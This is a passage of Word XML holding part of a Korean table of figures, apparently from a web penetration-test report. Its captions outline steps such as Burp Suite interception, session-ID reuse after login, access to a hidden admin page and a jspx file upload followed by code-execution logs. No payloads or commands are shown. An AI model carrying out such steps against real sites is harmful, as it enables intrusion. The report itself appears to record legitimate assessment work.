          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094633" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 60. Burp Suite -&gt; Intercept on 후, 로그인 상태에서 새로고침</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094633 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22CD8F96" w14:textId="2E1F4BB0" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094634" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 61. 로그인 후에도 동일한 JSESSIONID를 사용</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094634 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="430A459C" w14:textId="10C2DC9D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094635" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 62. 코드 실행 로그</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094635 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C1D3C86" w14:textId="045589FA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094636" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 63. 코드 실행 로그</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094636 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08A7CC21" w14:textId="359418EC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094637" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 64. 코드 실행 로그</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094637 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="284ED3C0" w14:textId="6F96B130" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094638" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 65. 게시판에 작성된 게시물 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094638 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="731E2458" w14:textId="5CB3D76D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094639" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 66. “고객센터” 내 “공지사항” 페이지</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094639 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66653BA1" w14:textId="43979CBB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094640" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 67. 공지사항 페이지 소스 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094640 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54AD6C79" w14:textId="6E0DFFB4" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094641" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 68. 페이지 소스코드를 통해 URL 획득</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094641 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C2747C2" w14:textId="646121AD" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094642" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 69. 획득한 URL로 접근 시도</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094642 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29F8A33D" w14:textId="5E5AE772" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094643" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 70. 공지사항 작성 페이지 접근</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094643 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="429B12C2" w14:textId="717D3FBB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094644" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 71. “고객센터” 내 “QNA” 페이지</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094644 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="522B6DC6" w14:textId="21FC0961" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094645" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 72. QNA 페이지 “글쓰기” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094645 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="671F21D7" w14:textId="7B992BD1" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094646" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 73. 이미지 삽입 버튼 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094646 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>59</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="306217F0" w14:textId="41766676" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094647" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 74. jspx 파일 업로드</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094647 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E3D1C11" w14:textId="67F28112" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094648" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 75. “작성하기” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094648 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="496A95C3" w14:textId="248F3B84" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094649" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 76. 작성된 게시물 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094649 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19002EA9" w14:textId="421EB964" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094650" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
